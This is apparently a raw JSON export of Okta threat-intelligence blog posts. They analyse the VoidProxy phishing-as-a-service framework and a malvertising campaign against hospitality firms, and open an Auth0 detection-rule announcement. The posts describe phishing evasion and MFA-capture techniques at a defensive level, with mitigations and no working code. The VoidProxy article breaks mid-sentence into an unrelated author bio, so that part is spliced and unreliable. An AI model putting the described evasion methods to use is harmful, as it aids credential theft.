"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"}]},{"slug":"/articles/uncloakingvoidproxy","id":"a77a5e93-beab-5b8b-998d-c33343b6b9e4","title":"Uncloaking VoidProxy: a Novel and Evasive Phishing-as-a-Service Framework","date":"2025-09-11T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a detailed analysis on a previously unreported Phishing-as-a-Service (PhaaS) operation, which its authors name \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"VoidProxy\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy is a novel and highly evasive service used by attackers to target Microsoft and Google accounts. The service is also capable of redirecting accounts protected by third-party single sign-on (SSO) providers like Okta to second-stage phishing pages. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy represents a mature, scalable and evasive threat to traditional email security and authentication controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The service uses Adversary-in-the-Middle (AitM) techniques to intercept authentication flows in real-time, capturing credentials, MFA codes and any session tokens established during the sign-in event. This capability can bypass the protection of several common MFA methods, such as SMS codes and one-time passwords (OTP) from authenticator apps.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By offering this sophisticated PhaaS, VoidProxy lowers the technical barrier for a wide range of threat actors to execute AitM phishing attacks. Accounts compromised using PhaaS platforms facilitate numerous malicious activities such as Business Email Compromise (BEC), financial fraud, data exfiltration and lateral movement within victim networks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In all attacks we observed, users enrolled in phishing-resistant authenticators (in this case, Okta FastPass) were unable to share credentials or sign-in via VoidProxy infrastructure, and were warned that their account was under attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The VoidProxy platform has been able to evade analysis until this point by using multiple layers of anti-analysis features, including compromised email accounts, multiple redirects, Cloudflare CAPTCHA challenges, Cloudflare Workers and dynamic DNS services. Our understanding of VoidProxy arose from Okta’s unique ability to detect and alert on phishing attacks in customer environments where FastPass is used, as well as the dedicated work of our threat analysis and research team. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below, we summarize each anti-analysis technique, analyze the attacker’s infrastructure, and offer recommendations to defend against this threat. A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/uncloaking-voidproxy-phaas-framework\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"complete threat advisory\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", available to Okta customers at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/uncloaking-voidproxy-phaas-framework\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", also includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An in-depth, 20-page analysis of VoidProxy PhaaS infrastructure\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A peek inside the attacker’s admin panel\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicators of Compromise that identify threat actors known to be using the service. These indicators have been uploaded to Identity Threat Protection, a service that enables Okta customers to take in-line responses to user interactions with this infrastructure. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A VoidProxy attack, step-by-step\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 1: Delivery and lure\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the first phase of attacks we observed, phishing lures were sent from compromised accounts of legitimate Email Service Providers (ESPs) such as Constant Contact, Active Campaign (Postmarkapp), NotifyVisitors, and others, leveraging the reputation of these accounts to bypass spam filters.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedded in each phishing email were links to URL shortening services (such as TinyURL), which would each be redirected a number of times before the user is directed to first-stage landing sites in order to evade automated analysis.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5N67hYr5CYWtdJabKPPzHn\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 1. URLscan data showing the redirects from a tinyurl link to the phishing domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These first-stage phishing pages are hosted on domains registered with a variety of low-cost, low-reputation TLDs, such as .icu, .sbs, .cfd, .xyz, .top, and .home. This strategy minimizes operational costs and allows the attackers to treat the domains as disposable assets, quickly abandoning them once they are identified and blocklisted. The phishing sites are placed behind Cloudflare, effectively hiding the real IP address of the phishing site's server and making it much harder for security teams to trace and take down the malicious host.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 2: Evasion and lure loading\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Before any first-stage landing sites load, the user is presented with a Cloudflare CAPTCHA challenge to determine if the request is from an interactive user or a bot.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5J57QOckBsKqXbu88FViQC\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 2. Cloudflare CAPTCHA challenges presented on a phishing domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targeted user’s browser then communicates with a Cloudflare Worker (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"*.workers.dev\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"). We assess that this worker is likely to act as a gatekeeper and lure loader. Its primary functions are to filter incoming traffic and to load the appropriate phishing page for any given target. This architecture separates initial filtering from the core phishing operations of the campaign. Once a challenge is passed, the user is presented with a phishing page, which is a perfect replica of a legitimate login portal. \\n\\nFirst-stage phishing sites follow a consistent domain registration pattern, as described in the captions below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Co59Y6nNpjeVG8dFq7zKt\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 3. Domain pattern for Microsoft phishing pages: \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"login.Houssem Eddine Bordjiba is a Senior Identity Threat Research Engineer at Okta, bringing over a decade of expertise in cyber threat intelligence and threat hunting. He focuses on tracking threat actor activities and leading investigations into their motivations, tactics, techniques, and procedures (TTPs). His deep understanding of adversaries' motives and TTPs allows him to provide actionable intelligence that strengthens the defenses of Okta and its customers against evolving cyber threats. Houssem holds a Master's degree in Information Systems Security (MASc) from Concordia University in Montreal, Canada. Outside of work, Houssem enjoys an active lifestyle, pursuing his passions for soccer, martial arts, and various outdoor activities.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/78BflQYRAMZ06yNpD88cFj/80dbc1c31b0c5a9e8b0d9f40d023c3c4/Screenshot_2025-10-09_at_11.11.41â__AM.png"},"name":"Houssem Eddine Bordjiba","jobTitle":"Senior Identity Threat Intelligence Engineer","slug":"/hackers/houssem-eddine-bordjiba","node_locale":"en"}]},{"slug":"/articles/2025/08/attackers-target-hotelier-accounts-in-broad-phishing-campaign","id":"09948253-8136-506b-aaae-0285c83e5488","title":"Attackers Target Hotelier Accounts in Malvertising and Phishing Campaign","date":"2025-08-29T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence is tracking a large-scale phishing campaign that has impersonated at least a dozen service providers that specialize in hotels and vacation rentals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these attacks, targeted users are lured to highly deceptive phishing sites using malicious search engine advertisements, particularly sponsored ads on platforms like Google Search. The attacks leverage convincing fake login pages and social engineering tactics to bypass security controls and exploit user trust. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We observed at least thirteen hospitality companies impersonated with these lures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on the targeting and nature of the phishing lures, the campaign appears designed to compromise accounts for cloud-based property management and guest messaging platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We observed campaigns in which malvertising - the purchase of malicious search engine advertisements – was used to lure unsuspecting users of the impersonated hospitality or vacation rental company. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For instance, a search query for the name of one of these companies might display a number of sponsored ads that direct users to a malicious site:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6KchhSwDXuhaoDciF41oew\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 1. Example of malvertising showing two fake websites promoted above a legitimate domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Wyhfx7OsROvwh75NTrpi\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 2. Example of malvertising directing users to another phishing site \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Observed domains used a typosquatting variation of the legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user that navigates to one of these malicious domains is presented a fake login page. We observed a large number of phishing sites that impersonated at least thirteen hospitality companies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5jJtfPCU4pQjaDTnSZoprA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 3. Oracle Hospitality was one of numerous service providers impersonated\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on the targeting and nature of the phishing lures, the campaign appears designed to compromise accounts for cloud-based property management and guest messaging platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactics, Techniques and Procedures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The objective of the first stage of the campaign is credential harvesting. The phishing pages were configured to capture usernames, email addresses, phone numbers and passwords. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The observed activity demonstrates an intent to bypass or capture multi-factor authentication (MFA) codes. For instance, some phishing pages explicitly prompt for \\\"One time password\\\" or offer \\\"Sign in with SMS Code\\\" and \\\"Email Code\\\" options.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4kmrDtDymbOoVI9eyhsscW\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 4. Screenshot of a phishing website impersonating Airbnb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"29OuDoCcHLs7eZpV56RJbQ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 5. Once a phone number is entered, the phishing page prompts for OTP codes sent via SMS\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inspecting the source code of these websites, we can observe the following text: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The error message “Ошибка запроса” (“Request error”) and comment “Запускаем запрос каждые 10 секунд” (“We start the request every 10 seconds”) suggest the possibility of Russian-speaking actors behind this campaign. The campaign also employed a large Russian datacenter proxy provider during attacker sign-in activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The campaign also employs a beaconing technique for tracking and analytics. This allows the attacker to gather valuable real-time information about the victims who have landed on the phishing page, including: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Visitor Analytics\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Geolocation & Targeting\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Duration\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bot Detection\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Status Monitoring\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of indicators of compromise by selecting Okta Threat Intelligence at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/hospitality-firms-impersonated-in-malvertising-phishing-campaign \"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enrol customers and partners in the strongest available authenticator, prioritising possession factors like passkeys to introduce phishing resistance while minimizing user friction. Enroll workforce users in strong authenticators such as Okta FastPass, passkeys (FIDO2 WebAuthn) and smart cards and enforce phishing resistance in policy. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny or require higher assurance for requests from rarely-used networks. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identify and automate responses to requests for access to applications that deviate from previously established patterns of user activity using adaptive risk assessments.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor suspicious domain registrations to observe any changes in the content served up to users. Review application logs for any evidence of communication with suspicious domains. If content hosted on the domain violates copyright or legal marks, consider providing evidence and issuing a takedown request with the domain registrar and/or web hosting provider.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Warn users when malvertising and phishing campaigns appear to be targeting your brand.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Notify end users if suspicious activity is observed on their account.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Moussa Diallo contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Russia-linked campaign targets hospitality and vacation rental providers."},"updatedAt":"2025-08-29T01:06:39.276Z","secAuthor":[{"id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png"},"name":"Daniel López","jobTitle":"Cyber Threat Researcher","slug":"/hackers/daniel-lopez","node_locale":"en"}]},{"slug":"/articles/2025/08/auth0-detection-catalog","id":"11886729-a6bc-5c9d-bd08-5d3461f25ed8","title":"Using Auth0 Logs for Proactive Threat Detection","date":"2025-08-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We are thrilled to announce the launch of the\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\" Auth0 Customer Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", an open-source repository of detection rules designed to help the security teams at Auth0 customers to proactively identify and respond to security threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This catalog, now \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"available on GitHub\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", is a powerful complement to Auth0’s\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Security Center\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and existing\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"security monitoring alerting\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" offerings. The Auth0 Customer Detection Catalog allows security teams to integrate custom, real-world detection logic directly into their log streaming and monitoring tools, enriching the detection capabilities of the Auth0 platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The catalog provides a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious activities like anomalous user behavior, potential account takeovers and misconfigurations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This resource is ideal for a variety of users, including:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tenant administrators and developers:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Security-focused rules helping administrators to catch unintentional misconfigurations early.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"DevOps teams:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Incorporate advanced security monitoring into your existing operational workflows.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Security analysts and threat hunters:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Gain a strong foundation for building sophisticated detection rules tailored to your unique environment.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Why you should use it\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Auth0 Customer Detection Catalog is a force multiplier for your security efforts. Here's why this resource is an essential addition to your toolkit:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Sigma-Compatible:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" All detections valid\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Sigma rules\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", a generic signature format that can be easily converted into a variety of SIEM and log analysis tools. This allows you to set up rules in familiar tooling without needing to rewrite them.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Actionable Intelligence:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Each detection contains valuable metadata, including descriptions of the threat, relevant log fields, and recommended preventative actions. This provides security analysts with the context needed to respond quickly and effectively.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Proactive Threat Updates:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" The catalog is regularly updated with new detections from Okta and Auth0, based on our analysis of real-world threats. This ensures you can stay ahead of emerging attack techniques.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Community-Powered:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" By being open source, the catalog benefits from the collective expertise of the security community. This collaborative approach allows for the rapid dissemination of detection strategies, making everyone more resilient.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Putting Detections to Work\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Auth0 Customer Detection Catalog is designed for immediate use. Here's how to integrate these queries into your security workflows:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Access the Catalog:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" The entire collection of detection rules is available in our public\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\" GitHub repository\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Generate Queries from\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/docs/guide/about.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" 